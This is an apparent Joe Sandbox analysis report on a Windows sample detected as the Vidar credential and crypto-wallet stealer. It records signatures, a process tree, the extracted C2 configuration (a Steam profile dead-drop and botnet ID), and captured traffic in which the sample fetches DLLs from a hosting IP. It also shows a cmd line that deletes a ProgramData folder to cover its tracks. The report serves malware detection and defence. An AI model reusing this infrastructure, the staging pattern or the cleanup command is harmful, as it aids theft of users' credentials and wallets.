Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1433685
MD5:b898ced2e152060f5770f1c6337006f6
SHA1:b607705b76412adecc350bd38994d94ca3870f5a
SHA256:716b19201a3109a3fb15b0401cb86a9be6df726c8b3a1a1c88cefb445457966b
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking computer name)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B898CED2E152060F5770F1C6337006F6)
    • RegAsm.exe (PID: 7440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 9028 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 9036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 9072 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • chrome.exe (PID: 7532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://796299082092352771018332050787432950295397740/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x201f8:$s1: JohnDoe
      • 0x2ef80:$s1: JohnDoe
      • 0x201f0:$s2: HAL9TH
      00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.a2b000.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.file.exe.a2b000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x1f3f8:$s1: JohnDoe
              • 0x1f3f0:$s2: HAL9TH
              1.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                1.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x1f3f8:$s1: JohnDoe
                • 0x1f3f0:$s2: HAL9TH
                1.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 5 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}
                  Source: file.exeReversingLabs: Detection: 31%
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406252 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00406252
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004061EF CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_004061EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040825F memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_0040825F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00402420 memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_00402420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040F82E CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_0040F82E
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.210.138.105:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.242.142:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                  Source: Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr
                  Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A17331 FindFirstFileExW,0_2_00A17331
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004011D9 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_004011D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004145BC _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_004145BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414CC7 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00414CC7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040BDAF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040BDAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409E01 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409E01
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00413F80 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00413F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004093C1 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004093C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004097DC _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004097DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414960 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00414960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041433D _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_0041433D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199680449169
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 23.210.138.105 23.210.138.105
                  Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.242.142
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00404165 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00404165
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
